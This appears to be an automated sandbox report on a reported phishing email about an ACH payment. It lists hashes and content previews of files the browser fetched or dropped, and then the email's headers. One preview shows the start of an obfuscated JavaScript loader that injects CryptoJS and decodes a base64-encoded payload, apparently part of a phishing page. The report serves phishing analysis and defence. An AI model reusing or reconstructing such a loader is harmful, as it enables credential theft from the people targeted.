                                                                Preview: var xaNyNpzdqJxxkCRG = document.createElement("script");..xaNyNpzdqJxxkCRG.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(xaNyNpzdqJxxkCRG);..xaNyNpzdqJxxkCRG.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiTEI2YmRvYlZRN0czaERjYkl1ZUk3Wmp6bjUzNDN6NEpmd2tKdnJkOTExYWczbXZhajJzVnVwM1lDcmMwR05XMDdRMnI0V0hIWk1YM1Z2VnhaWlpJMEhJNE9JdHJOWUhQdzdRejh0ZzJPK0ZKT2JmVUV5d0FxQ1V4RGZNRTJOcFVQWHd2bHVlVWROOHF2WXN3K1pZVXVnRncrQjczb2NEOEhhUTRkS0tvK3BmVjRxZ3JOczFKcWJOUytRaUY1UU84anZJVXpIRWp1V3AxbVFwWU01RmFuY3Q3VHB4cmxpV2dNaTMzVzlqTFBvMkZ0ZWtpcDhEcXVlUzg1S0Y1aXczZzZwZ3c3dFZoTUg2ellSQytzWkF5dnJqeUEzQzhJRHA3c3podlo1OU56MmRha3VYZDFjY0pDYlBcL3BCT2NuZURVSzB3N3lGZlVJMUl6b2FENWJuSUFjcmpmTUV5MHpYc0tzZHZpc0R2Y1MxZ1lOMnlNUFdYa1NnTmdyMDlyV1Y2MkZSQjJPczRPUjVtd2d5VGJaWW4zSm9nQVErXC9zVmFxc3A0VmFcL2RBZHVmQzRTTG9DZTZKWU9FOWZsR3RkcWM2Sk50N3Q4ekVGRUJtNjhhWlNPbkZhK1NWcm5OWjVBZlYxSmVQeXFhRWVQSlwvQVRZTjh3YVNSR21tQzJsUklZcGZBRkxPUG5VNThNWE1cL1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (56015)
                                                                Category:dropped
                                                                Size (bytes):56066
                                                                Entropy (8bit):5.400548167770734
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:449A9DEF2F0C6FC3B72C71164A97BDA3
                                                                SHA1:25852714E23804A5500D693786CA8254025EE205
                                                                SHA-256:220F5BD08E467A31A10A9CA1548E3580CEEB6064EAFC047ACFE35C2589BEC54F
                                                                SHA-512:6E294FDD22793F50FB1541773BD1120BAD31108CC7EDD5F951438EB55F13A0E1574A8042750BC23BF2522AAC2F4D406322861BD10D6951D9ED30F98C16DDD274
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(){var t={8488:function(t,e,n){var r=n(2746);t.exports=r},3104:function(t,e,n){var r=n(7273);t.exports=r},6564:function(t,e,n){var r=n(2445),o=n(3478),i=n(7269),a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not a function")}},5719:function(t,e,n){var r=n(2445),o=n(3478),i=r.String,a=r.TypeError;t.exports=function(t){if("object"==typeof t||o(t))return t;throw a("Can't set "+i(t)+" as a prototype")}},1313:function(t,e,n){var r=n(4486),o=n(6635),i=n(9783),a=r("unscopables"),s=Array.prototype;null==s[a]&&i.f(s,a,{configurable:!0,value:o(null)}),t.exports=function(t){s[a][t]=!0}},3855:function(t,e,n){var r=n(2445),o=n(7455),i=r.TypeError;t.exports=function(t,e){if(o(e,t))return t;throw i("Incorrect invocation")}},4482:function(t,e,n){var r=n(2445),o=n(3406),i=r.String,a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not an object")}},3410:function(t,e,n){"use strict";var r=n(2445),o=n(6981),i=n(5633),a=n(2048),s=n(7065),u=n(1977),c=n(9
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47261)
                                                                Category:downloaded
                                                                Size (bytes):47262
                                                                Entropy (8bit):5.3974731018213795
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 29888, version 0.0
                                                                Category:downloaded
                                                                Size (bytes):29888
                                                                Entropy (8bit):7.993034480673089
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:E465F101F881B07CCFBB55D51D18135F
                                                                SHA1:0D76B152EA1AE4AA68DB36DCC7BD204ACDC571D3
                                                                SHA-256:6F5EBFD0FC9A520ADCA234FDD34B4DFBEB106942A6F44E65FC1AC54F7D2D6498
                                                                SHA-512:2C1F730DB5108DDE4731F22838AD7EEF4D6698ED5EA0C0951B81B21722DF8051623923672C46F9397F81E74741CDEC794F03AAC37E532D1223A1A1CE448C73AA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/fonts/support-icons/mdl2/latest_v4_70.woff2
                                                                Preview:wOF2......t........X..tb.........................`..`..6.*..Y..... ....6.$..,.. .. ..s. ..S."..`...@.."..........!!.T5..?.........#t..7. .. ~"?A..A...4./..}.'.D.8.E......C......T..o.......l.UJ*..SB...U.D6..W..uV.j,...+.>"N...}.&E..P~....z..w...Z".k...S:..t.7.fA.ic;%HZi...W.....w...I.p..........=>....) X ....@B......R ..P..$H.....h.{,..X..l. ..uY.w.Kc..+........r.H....... .....!....7$.b......@(Mp..,."z..(......V....y.E..w\...n./...&...+...R.......\~d,.....S..r%.s.s.......h...:.@.!h..(.< .@..0.P2H*..!..r.6..V.r.:..)T.9T..n......;....+a...).L+....eX....|.x...$]hS....+e+ HK.H'Q..RJ..X...}.....l....=S.G.e.{..I%9.1.O~k....@.$.{.M*^.......~z...2...r.]b..[......(.H... ...z.)...&....9..$.Q1F...1......7C..UJ...T..F....Z..K.......F..&L0c...p..N8..g...W\...q........Oz..O./......#..... ..L0B.A(..#..#..D..(..M4b.A,..`A.q.'..$ .D$..d..B.RIE.iH'..d .L.....M6r.A..3......PH!.(B1.(......2.S..*PI%..B5......:.S....H#.hB3.h......6...:.I'..B7.......>...+V.0.A.1...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (503)
                                                                Category:dropped
                                                                Size (bytes):558
                                                                Entropy (8bit):4.98634955391743
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A3BC5418F2834309CE2918B15F3B8EEA
                                                                SHA1:62BA2712C6D4960F1057E103F6E1F3C95F2C701B
                                                                SHA-256:B2B62643A7C4FE4A4E12934AD819F0293CC00181B78D8091AFFFF3617CEB96B1
                                                                SHA-512:460E22E36E93BEC194D00D47754108539D2E54FF59D4293EEC25463BC3D642879C10D9BBFD881BBE5EC244819F325C422B6D7A7504000BBCE432E4D2A08FB58B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(){"use strict";function e(e){return document.querySelectorAll(e)}function t(e,t){e.remove(),t.style.removeProperty("display")}window.addEventListener("load",(function(){var o,r=e(".ocpSectionLayout .ocpSection"),n=e(".ocpSectionLayout .shimmer-effect");if(r.length===n.length)for(var i=0;i<n.length;i++){var c=(o=n[i],Number(o.getAttribute("shimmer-delay")));setTimeout(t,c,n[i],r[i])}else n.forEach((function(e){e.remove()})),r.forEach((function(e){e.style.removeProperty("display")}))}))}();.//# sourceMappingURL=shimmerExperiment.Main.min.js.map
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2389), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):22309
                                                                Entropy (8bit):5.87776766913742
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0FB325C3D577CB57EA759166B7F66379
                                                                SHA1:7B11276A389BE8007B16267B3E5487ADA649386C
                                                                SHA-256:A82BAC087832519619961416963341A2C2F9DACB8BFF6FC2426B5CAA52B5C508
                                                                SHA-512:62658C65195387DF346297E2447968A8AFA1A535B0B9A4BBC15619DAB236384AD9F48466E0EEB20C4126F8DAF87DCDD4B8ADABEA56870852A28FB15471877D50
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/js/require-config.js
                                                                Preview:const baseURL = 'https://www.microsoft.com/videoplayer/';....requirejs.config({.. paths: {.. "platform": baseURL + "lib/onerfstatics/onerfcomponentfactory",.. "telem": baseURL + "lib/onerfstatics/onerfonedsconfig",.. "redtux": baseURL + "lib/mwf/slider".. }, bundles: {.. "platform": ["requireJS", "ariaWebTelemetry", "html5Shiv", "html5ShivMin", "modernizrMin", "pictureFillMin", "RedTiger_telemetry"],.. "telem": ["trackHelper", "jsll"],.. "redtux": ["copyrightHeader", "iController", "iCollectionItem", "videoClosedCaptions", "videoControls", "keycodes", "viewportCollision", "utility", "swipe", "stringExtensions", "removeFocus", "publisher", "observableComponent", "htmlExtensions", "handleImageError", "componentFactory", "breakpointTracker", "actionToggle", "additionalInformation", "alert", "areaHeading", "autosuggest", "backToTop", "banner", "biProductPlacement", "obsoleteCarousel", "checkbox", "combo", "compareChart", "contentPlacement", "
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                Category:downloaded
                                                                Size (bytes):26288
                                                                Entropy (8bit):7.984195877171481
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):72
                                                                Entropy (8bit):4.241202481433726
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 12 x 47, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):4.035372245524405
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:91956A1BBBD76AB319B08870409AC860
                                                                SHA1:90761392B6CD9DC2F040E8A2C6C544CD9F970AC9
                                                                SHA-256:ED83E2191BAF73A2ED82697179D2C7925808D8227A89DAC61C1D0197445AE3AC
                                                                SHA-512:ACDE0FB425220A89AEAD92D9E18D964B88D837F732DEA360BB1F07A87ED4412E0CC9CBCAA9B787F5D7D86DBE03DFFDFE7F5D57F3AC1CAD3583777A0B98AA1BC2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cedeea7bbd878e8/1728304540740/zM3pqNi7PWN8Ie-
                                                                Preview:.PNG........IHDR......./.....X/.(....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (30237)
                                                                Category:downloaded
                                                                Size (bytes):30289
                                                                Entropy (8bit):5.260974426031687
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F04D3E51969894BD486CD9A9A1549EA6
                                                                SHA1:6DB7ED2E034FE99F5013144CA91DD21408F7AC36
                                                                SHA-256:33A747222E8AE5381AEB53C9671BB3EB309B7226587674CD6D901F99645A852B
                                                                SHA-512:C7BE3DAB8EF8DBCB3A0AA6022F8191F155358E4E974F0E42F9CD88C372EE77EB4513A6CC54E373CFE90232D67C6B02406B4D281D8158C24B51C8AA433452911C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://mem.gfx.ms/meversion?partner=SMCConvergence&market=en-us&uhf=1
                                                                Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"smcconvergence","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authA
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):237010
                                                                Entropy (8bit):5.6374177758322155
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:08A92BAE70E556FE42FBB5933C1E2BD0
                                                                SHA1:99ED357B62457851225C175DAB4E19F014ABD8D7
                                                                SHA-256:4BFFE4635920A781333870302B67769C9F5D80DA3DCA2973E615933142C5D1D7
                                                                SHA-512:F4F90A1F9FD0654049413684175332FA9D770CF6F30C348199AA7E3EBF9C3288F590FFB6B25C13175AD5FE5D06FFB9E3374C3FB3832FA3FF4D08E08E9C549526
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?(/*define([],e)*/window.Hls=window.Hls||e()):"object"==typeof exports?exports.Hls=e():t.Hls=e()}(this,function(){return function(t){function e(i){if(r[i])return r[i].exports;var a=r[i]={i:i,l:!1,exports:{}};return t[i].call(a.exports,a,a.exports,e),a.l=!0,a.exports}var r={};return e.m=t,e.c=r,e.d=function(t,r,i){e.o(t,r)||Object.defineProperty(t,r,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var r=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(r,"a",r),r},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="/dist/",e(e.s=8)}([function(t,e,r){"use strict";function i(){}function a(t,e){return e="["+t+"] > "+e}function n(t){var e=self.console[t];return e?function(){for(var r=arguments.length,i=Array(r),n=0;n<r;n++)i[n]=arguments[n];i[0]&&(i[0]=a(t,i[0])),e.apply(self.console,i)}:i}function o(t){for(var e=argu
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (13140)
                                                                Category:downloaded
                                                                Size (bytes):13185
                                                                Entropy (8bit):5.103615284997676
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:016DF3491DC10129A0AE8E4D746365AA
                                                                SHA1:57AF9988612B0E968EF05554589FF5495CE7B81C
                                                                SHA-256:F44D4A6983333E0CCE8215E11484EEA375B9494A651B64B1363AFC9F7C8AD0E9
                                                                SHA-512:1651C6AC44F3823C081D8578F608797C3B895D7EE66B433F9DDD3E7749C2A1E2994487801EFBF96E84C34A0858BF27AEBFC8FD1D4B10FC36CBDD2DBCC007AC9F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/js/Article.Main.min.js?v=9E1KaYMzPgzOghXhFITuo3W5SUplG2SxNjr8n3yK0Ok
                                                                Preview:!function(){"use strict";var t,e="click",n="ocHidden",o="collapsed",i=function(){function t(){var t=this;this.collapsed=!0,this.container=$("#supAppliesToList"),this.collapseButton=$(".appliesToOverflowControl.collapse").click((function(){return t.collapse()})),this.expandButton=$(".appliesToOverflowControl.expand").click((function(){return t.expand()})),this.reversedItems=this.expandButton.prevAll(".appliesToItem"),this.reversedItems.length>0&&(this.collapse(),$(window).on("resize",(function(){return t.handleResize()})))}return t.prototype.expand=function(){this.collapsed=!1,this.container.removeClass(o),this.reversedItems.removeClass(n),this.collapseButton.toggleClass(n,this.reversedItems.offset().top<=this.container.offset().top),this.expandButton.addClass(n)},t.prototype.collapse=function(){var t=this;this.collapsed=!0,this.container.addClass(o),this.reversedItems.removeClass(n),this.collapseButton.addClass(n),this.expandButton.addClass(n),this.reversedItems.each((function(e,n){ret
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (3385), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):3385
                                                                Entropy (8bit):5.293928956465786
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:838B4CF03009164350BEE28EC54B1B28
                                                                SHA1:7289901F526CD15984F080E40BBF8B8B6098EB73
                                                                SHA-256:70C7CD74052E7BB3716548F7748B7FBF90C8BB39B0F688495B5D3D8974295A72
                                                                SHA-512:48763334DD0DE579917B94CC53A7D002AFF1D5EF46D2D4BEA8991B05ACB355CD67A21495751EDCB89DFB0A6AE3F773419DAFF49A6DFE9EA48CC8E80BCBF99BF1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/StickyFeedback/sticky-feedback.css?v=cMfNdAUue7NxZUj3dIt_v5DIuzmw9ohJW109iXQpWnI
                                                                Preview:.supStickyFeedback{position:fixed;width:100%;bottom:0}.supFeedbackFullTextIsOpen{height:222px}#ocHelp{min-height:75%}#supWrapperToPreventFeedbackFlickering{min-height:59px}.ocSmartFeedbackBegin{height:38px}#supFeedbackWrapper{background-color:#f2f2f2;max-width:none;z-index:10000}#supColumnWrapper{padding:11px 0 10px;border-bottom:1px solid #cecece}#supDisableStickyFeedbackButton{position:absolute;top:0;right:15px;font-size:1.4em;text-decoration:none}html[dir=rtl] #supDisableStickyFeedbackButton{left:15px;right:auto}html[dir=rtl] .ocFeedbackButton{margin:12px 0 0 5px}html[dir=rtl] .ocSmartFeedbackReply{text-align:right}#ocMainContent{min-height:100%}.ocFeedbackButton{min-width:62px;height:28px;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue",Helvetica,Tahoma,"BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:15px;font-weight:normal;color:#313131;display:inline-block;text-align:center;text-decoration:none;border:1px solid transparent;background-color:rgba(0,0
                                                                File type:SMTP mail, ASCII text, with very long lines (941), with CRLF line terminators
                                                                Entropy (8bit):6.087081594246913
                                                                TrID:
                                                                • E-Mail message (Var. 1) (20512/2) 100.00%
                                                                File name:original.eml
                                                                File size:97'129 bytes
                                                                MD5:2faa494e98f91452fe671513610826b9
                                                                SHA1:e7b3e88ef7219532cc24c49d72f151e685495c81
                                                                SHA256:5c5c7ace4ddb9ff4764b3050cee302ee0fb5d584010e8b3a033c571679934ae3
                                                                SHA512:3345ddcb4fd7ba92863849b3bd0d6f319228184e4594ca2b8ef3e4363c017ec24f101e75f449db8c08428a85ec55e5c821d01f087ea0263b175f9ab662d26b64
                                                                SSDEEP:1536:SfB0af3qWqNH2P9xkwLdCizrQoem9CZ9bgJCJzI6sTM1k6KgFqTM:SfDvqWU2jCZ9bgJKzI6wWk6Kgl
                                                                TLSH:6D939D468E493DE4CF5161A93CEC3DC716FE3BCBA4B321C43A6C2A86019B6C4D7CA556
                                                                File Content Preview:Return-Path: <laurence.brochu@metalus.qc.ca>..Received: from YT5PR01CU002.outbound.protection.outlook.com (mail-canadacentralazon11021125.outbound.protection.outlook.com [40.107.192.125]).. by inbound-smtp.us-east-1.amazonaws.com with SMTP id nv9rcdovdsjo
                                                                Subject:[Phish Alert] Metalus ACH PAYMENT REAPPLICATION ACCOUNT #8c54702006c6e13e9d9945016292c10c
                                                                From:"Laurence Brochu, CRHA" <laurence.brochu@metalus.qc.ca>
                                                                To:"c9025caf-ebfb-4a55-8a88-3cf1915dac7c@ca.phisher.knowbe4.com" <c9025caf-ebfb-4a55-8a88-3cf1915dac7c@ca.phisher.knowbe4.com>
                                                                Cc:
                                                                BCC:
                                                                Date:Mon, 07 Oct 2024 12:21:22 +0000
                                                                Communications:
                                                                • [Vous ne recevez pas souvent de courriers de besprechungsraum@pibsi.de. Dcouvrez pourquoi ceci est important https://aka.ms/LearnAboutSenderIdentification ] Avertissement: Ce courriel provient d'un expditeur externe. Ne cliquez sur aucun lien et n'ouvrez pas de pice jointe, sauf si vous connaissez l'expditeur et si le contenu est fiable Laurence Brochu, CRHA Agente de recrutement et des mdias sociaux 819-475-3114 #268 Drummondville, QC [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logocarteMetalusBleuWhiteSmall.png] [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logofacebooksmall.png]<https://www.facebook.com/MetalusInc/> [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logolinkedsmall.png] <https://ca.linkedin.com/company/m-talus> [https://raw.githubusercontent.com/Metalus-Inc/signature/main/logoinstasmall.png] <https://www.instagram.com/metalusinc/>
                                                                Attachments:
                                                                • phish_alert_sp2_2.0.0.0.eml
                                                                Key Value
                                                                Return-Path<laurence.brochu@metalus.qc.ca>
                                                                Receivedfrom YTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM ([fe80::8fdd:71e5:b520:7854]) by YTBPR01MB3149.CANPRD01.PROD.OUTLOOK.COM ([fe80::8fdd:71e5:b520:7854%3]) with mapi id 15.20.8026.020; Mon, 7 Oct 2024 12:21:22 +0000
                                                                Received-SPFpass (spfCheck: domain of metalus.qc.ca designates 40.107.192.125 as permitted sender) client-ip=40.107.192.125; envelope-from=laurence.brochu@metalus.qc.ca; helo=YT5PR01CU002.outbound.protection.outlook.com;
                                                                Authentication-Resultsamazonses.com; spf=pass (spfCheck: domain of metalus.qc.ca designates 40.107.192.125 as permitted sender) client-ip=40.107.192.125; envelope-from=laurence.brochu@metalus.qc.ca; helo=YT5PR01CU002.outbound.protection.outlook.com; dkim=pass header.i=@metalusinc.onmicrosoft.com; dmarc=pass header.from=metalus.qc.ca;
                                                                X-SES-RECEIPTAEFBQUFBQUFBQUFHYmRrUUxzcEh5RE9PR2RwdXc1TFpqOHBJRTh1ODJOTkViTit3NFVuYnNMK1ZNQllPbXg4eThRRHdYL0tINUUxTXA5RXlLSVVaWGlZTDVTK1lEeUpTT0NST3hRS05DU1pEOFJVMGVRS1VFdEJhZURzMVpQMDFCZUZ4SzVKdHlyTTVKb0xCdnRtbWxaUXZuS01QSVpKREFQdllTUVpKN29YKzBTR3NQRmFRNG85R2tDcEx2eWNZc2xtKzBHUUY3VVo1Z0NJOE8vRHZrMWY5TElxaGY0YmFjRzltTHpBb3E5QzdxdC9TV3orOEhvT0F5R1VVN2NZWkk1Z3pva3Y5SWVOR2s3SG0vTGFqYVZFZHU5TDFpU0hMVE1lQ2FudWJRemQwdHZXMy8xbWtQdnBjOENSZ3hNWmxPN0xGVGp3bXVJckE9
                                                                X-SES-DKIM-SIGNATUREa=rsa-sha256; q=dns/txt; b=psWnO80Sam/vHEJD8U4nvoHmg/A8Lsw96nNqOsNXom45ECYbq/omabY1Mug09+ZfJkwtE5NjxYea/1kRN13nwWGkuIp+vUnc6tURWhREHupv0t2ntXB8Jf6vPDN4D+IsRT4UhYifPTl91Zw/lmdBX3cAjjekCV3+SYJzEOaIY3Y=; c=relaxed/simple; s=ug7nbtf4gccmlpwj322ax3p6ow6yfsug; d=amazonses.com; t=1728303685; v=1; bh=NJpYR6Ve6X6rJrWfm696YPFCwzcTDhXSpiXcaSz+quQ=; h=From:To:Cc:Bcc:Subject:Date:Message-ID:MIME-Version:Content-Type:X-SES-RECEIPT;
                                                                ARC-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=hgt0uQvVCLzUT6RbbaEGdhrfIiZKLVoxoHpWPjW8dSZqvXRtWo8wqPH55d7MilVlhjfbQMoFwfmRr1VUUwEfthma+dJMGqii/QgP1R3fH99AwhubYK8C75wYClTqyPyZBu34Ih9JytSBtt51oxKz4TQ/GZ3CuP3pv5CCWmzlsdvjspQ1c+SIf8JXxkmmffLQfslRxSBl8oDBe18qASsQnzjU4cIzo/OjdQxzv3fRrA1hm5D/A/lelh6F1rpH4IskAbI5b5ZI+ocAVDJVGmXDklVgsAW/NxT5T1q6IZAVn40vU3u7BxsviJH0VK37mwmGYdm/qSHuUX3uVyqWxX0VJg==
                                                                ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=rtVNiQmq11IKLDz074jyrvGzWvWzREY0qWAYOrQOdto=; b=w6Cim9/IFsAn2FWLfViM8DzXUIQFD6K19tf3yumOovA9H8LWOUn5+JW05smFxGxpPUnvZKORA4EyeWmVArXF6FMGvqziSWhLVyLnBQPg7z5QBbZupBUcqPWgLlmHTpcr+W3qqsarFFYSVKtgAMhEFQox6/Fi4oY27K5EdRyfoyLKlgc6H9Uu8YBXOa2F+ramkdxDZczpX+1bQlfK91U0VuqZErxZtGfYiJ9XvmBloBu8kG7JAx8qZjUkMrJL/45Jh1tufGCGgn5itM+O9sa5UJFS+53p76vQR10u7uC/7/iluuikpDzGgfT4WkmtZ8QRj4ttve6CU5oOzvQkeP1hgg==
                                                                ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=pass smtp.mailfrom=metalus.qc.ca; dmarc=pass action=none header.from=metalus.qc.ca; dkim=pass header.d=metalus.qc.ca; arc=none
